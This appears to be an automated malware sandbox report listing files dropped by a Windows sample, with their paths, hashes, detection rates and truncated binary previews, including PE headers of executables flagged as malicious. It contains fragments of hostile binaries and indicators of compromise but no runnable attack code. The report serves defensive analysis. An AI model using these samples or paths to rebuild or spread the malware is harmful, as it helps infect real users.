                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.8553638852307782
                                                                Encrypted:false
                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):5242880
                                                                Entropy (8bit):0.037963276276857943
                                                                Encrypted:false
                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):685392
                                                                Entropy (8bit):6.872871740790978
                                                                Encrypted:false
                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: So7a8eQerR.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):608080
                                                                Entropy (8bit):6.833616094889818
                                                                Encrypted:false
                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: So7a8eQerR.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):450024
                                                                Entropy (8bit):6.673992339875127
                                                                Encrypted:false
                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):685392
                                                                Entropy (8bit):6.872871740790978
                                                                Encrypted:false
                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):608080
                                                                Entropy (8bit):6.833616094889818
                                                                Encrypted:false
                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):450024
                                                                Entropy (8bit):6.673992339875127
                                                                Encrypted:false
                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1850368
                                                                Entropy (8bit):7.947891331207105
                                                                Encrypted:false
                                                                SSDEEP:49152:xpkVLhYxWoVeqHgj2VgzPaRhHz4XjjBvjkA3zxb:v0qwXaRJ4l3zx
                                                                MD5:1608CACCC377A28575B839E3EEC49314
                                                                SHA1:EE0126916F65D88E92248D9C1BBE5EE2883D2ABE
                                                                SHA-256:BF54E9BA7F3F8D09AEDEF4E6D9D377F16BB085CB5353352A3F1BB5D17F3E1263
                                                                SHA-512:206F4DC5FEDABEC29C3F2428FE6C25AB52BAF438F8D21E26993CE487C9D593825CB1797F1058095F5B4A69B0A35386E8BFBF9733CC4DF5F6F7DDA023B5B483A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................`I...........@...........................I...........@.................................X...l............................@I..............................@I..................................................... . ............................@....rsrc...............................@....idata ............................@... .p).........................@...ohmzqnep.0... 0..$..................@...ebipawoj.....PI.....................@....taggant.0...`I.."..................@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):288
                                                                Entropy (8bit):3.4220362045209325
                                                                Encrypted:false
                                                                SSDEEP:6:DiZCPX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1rLlEt0:+Uv4RKQ13vg7jzvYRQV1rSt0
                                                                MD5:9CEB045042A7244D3BCB9009BA4A27AE
                                                                SHA1:CDD5F403ECFEF58B566E91468D74600467F6B96E
                                                                SHA-256:2CF4CFEA125070D4A373FE9DE6CECD110D9E6F8FB24E4CA31C940AC9C926EA18
                                                                SHA-512:93BD25FA8A825D3DFBB0FB8024CE11AA9DC9C37F7FC6442780D05A51B33A5C7A3FDA00BDD61F8CA52A0D25B621BE208DD2FE5D932650246E55514B7AFEDC232A
                                                                Malicious:false
                                                                Preview:........}OE.OF.>...F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................%.@3P.........................
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.462951172463768
                                                                Encrypted:false
                                                                SSDEEP:6144:9IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:uXD94+WlLZMM6YFHg+n
                                                                MD5:D0ADA5CA1669382D1C9E1574A8880061
                                                                SHA1:9928A7CE8BE4DE532A4A24886E2299E59F0B8D50
                                                                SHA-256:1CE009E4684CB869A7A69D020D1399559074B6440BB7D102D090E8A154A40A37
                                                                SHA-512:084139FA0106869B8ED6DC7649370814983E1156B7331D2C8E7D6408A5AA22154F9D3675A71135DA26E738790E1F5C7FA2CB96F2F7ADD28F7286AB3FD2A7B6AD
                                                                Malicious:false
                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb...................................................................................................................................................................................................................................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.979116909327644
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
